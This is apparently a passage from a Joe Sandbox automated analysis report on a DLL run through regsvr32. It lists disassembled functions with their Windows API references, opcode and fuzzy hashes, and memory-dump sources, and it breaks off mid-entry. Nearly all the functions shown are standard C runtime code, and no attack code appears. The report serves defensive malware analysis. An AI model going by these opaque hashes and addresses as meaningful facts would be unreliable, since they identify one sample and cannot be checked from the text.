                                                                                                                                • Instruction Fuzzy Hash: 8061A232B0869396EB609F21D44467977D2FB48BF4B544635EA2E53BF4EE3CE8418342
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00007FFFEFB93EEC Relevance: 15.1, APIs: 10, Instructions: 121COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243882256.00007FFFEFB51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFEFB50000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.243873952.00007FFFEFB50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243927498.00007FFFEFBA2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243933800.00007FFFEFBA6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243939312.00007FFFEFBA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_7fffefb50000_regsvr32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: EnvironmentStrings$Free$ByteCharMultiWide$ErrorLastfree
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 994105223-0
                                                                                                                                • Opcode ID: f850f7f34601db923eac004d86ac393417d210c29532925b20230ca42a5e0836
                                                                                                                                • Instruction ID: f04231d866f97c636953c9ff7e9296ec7cb1398016aafdcfa5c2c7477f671d29
                                                                                                                                • Opcode Fuzzy Hash: f850f7f34601db923eac004d86ac393417d210c29532925b20230ca42a5e0836
                                                                                                                                • Instruction Fuzzy Hash: C0415D22B0D79782EA649B15A55423977E6FF88BE0F588434DA4E07BF4DE3CE491C702
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00007FFFEFB94F04 Relevance: 13.8, APIs: 11, Instructions: 90COMMONLIBRARYCODE
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243882256.00007FFFEFB51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFEFB50000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.243873952.00007FFFEFB50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243927498.00007FFFEFBA2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243933800.00007FFFEFBA6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243939312.00007FFFEFBA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_7fffefb50000_regsvr32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: free$ErrorFreeHeapLast_errno
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1012874770-0
                                                                                                                                • Opcode ID: 3c3af7d426be30cf8e9a0f4f5ff6786eb9999c553a10af8131577c7025441718
                                                                                                                                • Instruction ID: 0b234a765b735027e9d2c4669be139dc67a46fbd9216e93775635fb1f145c0bc
                                                                                                                                • Opcode Fuzzy Hash: 3c3af7d426be30cf8e9a0f4f5ff6786eb9999c553a10af8131577c7025441718
                                                                                                                                • Instruction Fuzzy Hash: 89410C32A09A87C4EF65DF25D5903B933E4AF84B64F089031DA0D4A6F9DF2DE891C352
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00007FFFEFBA0A34 Relevance: 13.8, APIs: 9, Instructions: 256COMMONLIBRARYCODE
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243882256.00007FFFEFB51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFEFB50000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.243873952.00007FFFEFB50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243927498.00007FFFEFBA2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243933800.00007FFFEFBA6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243939312.00007FFFEFBA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_7fffefb50000_regsvr32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: free$_errno$DecodeEnvironmentPointerVariable__wtomb_environ
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3451773520-0
                                                                                                                                • Opcode ID: e694225545c17882180803efd4dd10bf6022db2104e00cc5aed2eaf73a595679
                                                                                                                                • Instruction ID: c953aef9ff8ec9834251d9a416ed3b49869557a098679cba04483d0dea66beba
                                                                                                                                • Opcode Fuzzy Hash: e694225545c17882180803efd4dd10bf6022db2104e00cc5aed2eaf73a595679
                                                                                                                                • Instruction Fuzzy Hash: FAA1A12AF0DE4341EA20AB25A91037A72D5FF807F8F548635D95E477F5DE3CA4998302
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00007FFFEFB9352C Relevance: 13.6, APIs: 9, Instructions: 98COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243882256.00007FFFEFB51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFEFB50000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.243873952.00007FFFEFB50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243927498.00007FFFEFBA2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243933800.00007FFFEFBA6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243939312.00007FFFEFBA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_7fffefb50000_regsvr32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: DecodePointer$_initterm$ExitProcess_lock
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2551688548-0
                                                                                                                                • Opcode ID: 7b592d45c7ca6c6d8cb3fd2d09d1fb2d25a7c433dc9c00e1470d97789b8f3c14
                                                                                                                                • Instruction ID: 7c6580cefd3d0df43f17690d25d533ea524e308fdbde6f14ce15f1066e8e367d
                                                                                                                                • Opcode Fuzzy Hash: 7b592d45c7ca6c6d8cb3fd2d09d1fb2d25a7c433dc9c00e1470d97789b8f3c14
                                                                                                                                • Instruction Fuzzy Hash: 7F415B21A0EA4381FA50AB19EC4037972E9BF887A4F584135EA5E43BF5EF3CE455C742
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00007FFFEFB93758 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 199COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • GetStartupInfoA.KERNEL32 ref: 00007FFFEFB9377D
                                                                                                                                  • Part of subcall function 00007FFFEFB93108: Sleep.KERNEL32(?,?,0000000A,00007FFFEFB92DA3,?,?,?,00007FFFEFB92DFF,?,?,?,00007FFFEFB9254F,?,?,?,00007FFFEFB9262A), ref: 00007FFFEFB9314D
                                                                                                                                • GetFileType.KERNEL32 ref: 00007FFFEFB938FA
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243882256.00007FFFEFB51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFEFB50000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.243873952.00007FFFEFB50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243927498.00007FFFEFBA2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243933800.00007FFFEFBA6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243939312.00007FFFEFBA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_7fffefb50000_regsvr32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: FileInfoSleepStartupType
                                                                                                                                • String ID: @
                                                                                                                                • API String ID: 1527402494-2766056989
                                                                                                                                • Opcode ID: be5b348199184886c2585225aa819b02cc7fe3bfefb3d916d7442fb5369bb0a2
                                                                                                                                • Instruction ID: d6e3631f1b0581ada00b29eecf893cd5c3968479d1c5224bcf578444f9977ab2
                                                                                                                                • Opcode Fuzzy Hash: be5b348199184886c2585225aa819b02cc7fe3bfefb3d916d7442fb5369bb0a2
                                                                                                                                • Instruction Fuzzy Hash: 7F912A22B18A8385E7508B28D4887683BD9BB06774F694735C67E463F1DF7DE846C312
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00007FFFEFB925F8 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 195COMMONLIBRARYCODE
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243882256.00007FFFEFB51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFEFB50000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.243873952.00007FFFEFB50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243927498.00007FFFEFBA2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243933800.00007FFFEFBA6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243939312.00007FFFEFBA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_7fffefb50000_regsvr32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: _errno$_getptd
                                                                                                                                • String ID: +$-$0$0
                                                                                                                                • API String ID: 3432092939-699404926
                                                                                                                                • Opcode ID: 8efefd5caa40435472e3a9c676caa775b17fe32abe7b41ee90b269364e345ab9
                                                                                                                                • Instruction ID: 43bc46b6dd0fa8c71a1270d3642b4b275a65284b502b21386fddb19ff0f5df55
                                                                                                                                • Opcode Fuzzy Hash: 8efefd5caa40435472e3a9c676caa775b17fe32abe7b41ee90b269364e345ab9
                                                                                                                                • Instruction Fuzzy Hash: AA71D222D0C68385FBB64A25D85537A36D5AF46774F298136CE5E126F1DE7CEC818303
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00007FFFEFB96AB8 Relevance: 10.6, APIs: 7, Instructions: 60COMMONLIBRARYCODE
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • _FF_MSGBANNER.LIBCMT ref: 00007FFFEFB96ADF
                                                                                                                                  • Part of subcall function 00007FFFEFB96F0C: GetModuleFileNameA.KERNEL32(?,?,?,?,?,00007FFFEFB97194,?,?,?,?,00007FFFEFB96C69,?,?,00000000,00007FFFEFB930C0), ref: 00007FFFEFB96FCF
                                                                                                                                  • Part of subcall function 00007FFFEFB9334C: ExitProcess.KERNEL32 ref: 00007FFFEFB9335B
                                                                                                                                  • Part of subcall function 00007FFFEFB9309C: Sleep.KERNEL32(?,?,00000000,00007FFFEFB96B19,?,?,00000000,00007FFFEFB96BC3,?,?,?,?,?,?,00000000,00007FFFEFB92DC8), ref: 00007FFFEFB930D2
                                                                                                                                • _errno.LIBCMT ref: 00007FFFEFB96B21
                                                                                                                                • _lock.LIBCMT ref: 00007FFFEFB96B35
                                                                                                                                • free.LIBCMT ref: 00007FFFEFB96B57
                                                                                                                                • _errno.LIBCMT ref: 00007FFFEFB96B5C
                                                                                                                                • LeaveCriticalSection.KERNEL32(?,?,00000000,00007FFFEFB96BC3,?,?,?,?,?,?,00000000,00007FFFEFB92DC8,?,?,?,00007FFFEFB92DFF), ref: 00007FFFEFB96B82
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243882256.00007FFFEFB51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFEFB50000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.243873952.00007FFFEFB50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243927498.00007FFFEFBA2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243933800.00007FFFEFBA6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243939312.00007FFFEFBA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_7fffefb50000_regsvr32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: _errno$CriticalExitFileLeaveModuleNameProcessSectionSleep_lockfree
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1354249094-0
                                                                                                                                • Opcode ID: 281a6b99e1ceef077376b7d12b8049e3985eb177f8c0a9ab58ee7c303b441a02
                                                                                                                                • Instruction ID: e270030fe64e245b2bfd247fe30da1c4b263767265ea8969c9c69be7937dfc99
                                                                                                                                • Opcode Fuzzy Hash: 281a6b99e1ceef077376b7d12b8049e3985eb177f8c0a9ab58ee7c303b441a02
                                                                                                                                • Instruction Fuzzy Hash: 12219D24E1DA0382F665AB10A45537A72EEEF847B0F045035EA4E476F6DF3CE8408702
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00007FFFEFB92D70 Relevance: 9.0, APIs: 6, Instructions: 37threadCOMMONLIBRARYCODE
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • GetLastError.KERNEL32(?,?,?,00007FFFEFB92DFF,?,?,?,00007FFFEFB9254F,?,?,?,00007FFFEFB9262A), ref: 00007FFFEFB92D7A
                                                                                                                                • FlsGetValue.KERNEL32(?,?,?,00007FFFEFB92DFF,?,?,?,00007FFFEFB9254F,?,?,?,00007FFFEFB9262A), ref: 00007FFFEFB92D88
                                                                                                                                • SetLastError.KERNEL32(?,?,?,00007FFFEFB92DFF,?,?,?,00007FFFEFB9254F,?,?,?,00007FFFEFB9262A), ref: 00007FFFEFB92DE0
                                                                                                                                  • Part of subcall function 00007FFFEFB93108: Sleep.KERNEL32(?,?,0000000A,00007FFFEFB92DA3,?,?,?,00007FFFEFB92DFF,?,?,?,00007FFFEFB9254F,?,?,?,00007FFFEFB9262A), ref: 00007FFFEFB9314D
                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FFFEFB92DFF,?,?,?,00007FFFEFB9254F,?,?,?,00007FFFEFB9262A), ref: 00007FFFEFB92DB4
                                                                                                                                • free.LIBCMT ref: 00007FFFEFB92DD7
                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 00007FFFEFB92DC8
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243882256.00007FFFEFB51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFEFB50000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.243873952.00007FFFEFB50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243927498.00007FFFEFBA2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243933800.00007FFFEFBA6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243939312.00007FFFEFBA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_7fffefb50000_regsvr32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ErrorLastValue_lock$CurrentSleepThreadfree
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3106088686-0
                                                                                                                                • Opcode ID: 1a58bbec3c0441b91cbee7445021737d92780d7df2029101222d8d22fa3fe0c2
                                                                                                                                • Instruction ID: 0bba00534ad186b53a260f21955c03a9261c5413c0272043e403f60cd33203e4
                                                                                                                                • Opcode Fuzzy Hash: 1a58bbec3c0441b91cbee7445021737d92780d7df2029101222d8d22fa3fe0c2
                                                                                                                                • Instruction Fuzzy Hash: 1A014424F09F4386FB659B65A44433972E2AF487B0B584234C92E027F5DE3CE494C222
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00007FFFEFB95B84 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 186COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243882256.00007FFFEFB51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFEFB50000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.243873952.00007FFFEFB50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243927498.00007FFFEFBA2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243933800.00007FFFEFBA6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243939312.00007FFFEFBA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_7fffefb50000_regsvr32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: _getptd
                                                                                                                                • String ID: Qr2_:g
                                                                                                                                • API String ID: 3186804695-1052752507
                                                                                                                                • Opcode ID: fa6ae430652ad88a2b7c0fc47314cf8fd6a4311639ac00b8795087540084e4bb
                                                                                                                                • Instruction ID: 3d88058773d3e8911292328eb3616fa57053581f2d8d37515f77dfc8c1d7231a
                                                                                                                                • Opcode Fuzzy Hash: fa6ae430652ad88a2b7c0fc47314cf8fd6a4311639ac00b8795087540084e4bb
                                                                                                                                • Instruction Fuzzy Hash: 1F818D72A0968796DB24DF25E1847AAB7E0FB447A4F504135EB8D47BA4EF3CE450CB01
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00007FFFEFB99DF8 Relevance: 8.8, APIs: 7, Instructions: 36COMMONLIBRARYCODE
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243882256.00007FFFEFB51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFEFB50000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.243873952.00007FFFEFB50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243927498.00007FFFEFBA2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243933800.00007FFFEFBA6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243939312.00007FFFEFBA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_7fffefb50000_regsvr32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: free$ErrorFreeHeapLast_errno
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1012874770-0
                                                                                                                                • Opcode ID: 2467c4f6b5832abe9fd2be6a03a61b6f94b407d58b9f6526efad8e926ce1459f
                                                                                                                                • Instruction ID: cd0479f45b77cc195e5cacee0b5888c25e9329871216d6feffff4a24a3db1a2f
                                                                                                                                • Opcode Fuzzy Hash: 2467c4f6b5832abe9fd2be6a03a61b6f94b407d58b9f6526efad8e926ce1459f
                                                                                                                                • Instruction Fuzzy Hash: 9101BA63A0884391EEA5DB65D4D137973E9AF94720F481031D60E865F5DF6DF8858313
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00007FFFEFB99E90 Relevance: 7.7, APIs: 6, Instructions: 246COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243882256.00007FFFEFB51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFEFB50000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.243873952.00007FFFEFB50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243927498.00007FFFEFBA2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243933800.00007FFFEFBA6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243939312.00007FFFEFBA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_7fffefb50000_regsvr32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: free
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                • Opcode ID: 66c2a68ae6921ce3eae9ed6cb47659e8359417b2a45b1d2ea151f135524af05a
                                                                                                                                • Instruction ID: 183950c0a67478672c510f893ce4302b2523286902b90e5598542ec00ee2d96c
                                                                                                                                • Opcode Fuzzy Hash: 66c2a68ae6921ce3eae9ed6cb47659e8359417b2a45b1d2ea151f135524af05a
                                                                                                                                • Instruction Fuzzy Hash: F5B18F32B18B4285EB24DB62E4407AA77E4FB89764F505531EA8E437B5EF3CE105C741
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00007FFFEFB960B0 Relevance: 7.6, APIs: 5, Instructions: 88COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243882256.00007FFFEFB51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFEFB50000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.243873952.00007FFFEFB50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243927498.00007FFFEFBA2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243933800.00007FFFEFBA6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243939312.00007FFFEFBA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_7fffefb50000_regsvr32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: free$Sleep_errno
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2081351063-0
                                                                                                                                • Opcode ID: ec136e1b37b0cf75a1e1cbd0173697211363db55ec0de315659f58b3930cb5b5
                                                                                                                                • Instruction ID: df010dba4cad495ee0012634bb63d17df3731ef51058b10ac5d7c33e0e835c64
                                                                                                                                • Opcode Fuzzy Hash: ec136e1b37b0cf75a1e1cbd0173697211363db55ec0de315659f58b3930cb5b5
                                                                                                                                • Instruction Fuzzy Hash: 6E313921B0965381EB15AB25C4A137976EAAF85FE4F489035DE0D0B3FADE2CE8008342
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00007FFFEFB972D4 Relevance: 7.6, APIs: 5, Instructions: 72COMMONLIBRARYCODE
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • DecodePointer.KERNEL32(?,?,?,00007FFFEFB973E5,?,?,?,?,00007FFFEFB934D2,?,?,?,00007FFFEFB921CB), ref: 00007FFFEFB972FD
                                                                                                                                • DecodePointer.KERNEL32(?,?,?,00007FFFEFB973E5,?,?,?,?,00007FFFEFB934D2,?,?,?,00007FFFEFB921CB), ref: 00007FFFEFB9730C
                                                                                                                                • EncodePointer.KERNEL32(?,?,?,00007FFFEFB973E5,?,?,?,?,00007FFFEFB934D2,?,?,?,00007FFFEFB921CB), ref: 00007FFFEFB97389
                                                                                                                                  • Part of subcall function 00007FFFEFB9318C: realloc.LIBCMT ref: 00007FFFEFB931B7
                                                                                                                                  • Part of subcall function 00007FFFEFB9318C: Sleep.KERNEL32(?,?,00000000,00007FFFEFB97379,?,?,?,00007FFFEFB973E5,?,?,?,?,00007FFFEFB934D2), ref: 00007FFFEFB931D3
                                                                                                                                • EncodePointer.KERNEL32(?,?,?,00007FFFEFB973E5,?,?,?,?,00007FFFEFB934D2,?,?,?,00007FFFEFB921CB), ref: 00007FFFEFB97398
                                                                                                                                • EncodePointer.KERNEL32(?,?,?,00007FFFEFB973E5,?,?,?,?,00007FFFEFB934D2,?,?,?,00007FFFEFB921CB), ref: 00007FFFEFB973A4
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243882256.00007FFFEFB51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFEFB50000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.243873952.00007FFFEFB50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243927498.00007FFFEFBA2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243933800.00007FFFEFBA6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243939312.00007FFFEFBA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_7fffefb50000_regsvr32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Pointer$Encode$Decode$Sleep_errnorealloc
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1310268301-0
                                                                                                                                • Opcode ID: 45f99762a2f7ec127277c333d1f44571b1c8f3f0bb701b28e9aac5b400b42b2d
                                                                                                                                • Instruction ID: dbdc7b80e8a76b5de984e995649729ae2e1f7dc619c3f3de612ce452dd74ed69
                                                                                                                                • Opcode Fuzzy Hash: 45f99762a2f7ec127277c333d1f44571b1c8f3f0bb701b28e9aac5b400b42b2d
                                                                                                                                • Instruction Fuzzy Hash: 1E219011F0D64351EE10AB21E9442BAB3E1BB45BE0F944839D90D0BBF6DE7CE096C302
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00007FFFEFB971A4 Relevance: 7.6, APIs: 5, Instructions: 65COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243882256.00007FFFEFB51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFEFB50000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.243873952.00007FFFEFB50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243927498.00007FFFEFBA2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243933800.00007FFFEFBA6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243939312.00007FFFEFBA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_7fffefb50000_regsvr32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Pointer$Encode$Decode$Sleep_errnorealloc
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1310268301-0
                                                                                                                                • Opcode ID: eece0b224e2bcc70f9921190d9f8722cba86776407b6ce9ac89865c4675fc459
                                                                                                                                • Instruction ID: 02b6f042f5e471cac0de196745a53613a0ceaeb37e136edf1dfb6b978383cb9f
                                                                                                                                • Opcode Fuzzy Hash: eece0b224e2bcc70f9921190d9f8722cba86776407b6ce9ac89865c4675fc459
                                                                                                                                • Instruction Fuzzy Hash: 4A215021B1DA8394EE54EB11A644379B2E1AB46BE0F984435E95D07BF6DE3CF055C302
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00007FFFEFB93310 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17libraryloaderCOMMONLIBRARYCODE
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • GetModuleHandleW.KERNEL32(?,?,000000FF,00007FFFEFB93359,?,?,00000028,00007FFFEFB96C7D,?,?,00000000,00007FFFEFB930C0,?,?,00000000,00007FFFEFB96B19), ref: 00007FFFEFB9331F
                                                                                                                                • GetProcAddress.KERNEL32(?,?,000000FF,00007FFFEFB93359,?,?,00000028,00007FFFEFB96C7D,?,?,00000000,00007FFFEFB930C0,?,?,00000000,00007FFFEFB96B19), ref: 00007FFFEFB93334
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243882256.00007FFFEFB51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFEFB50000, based on PE: true
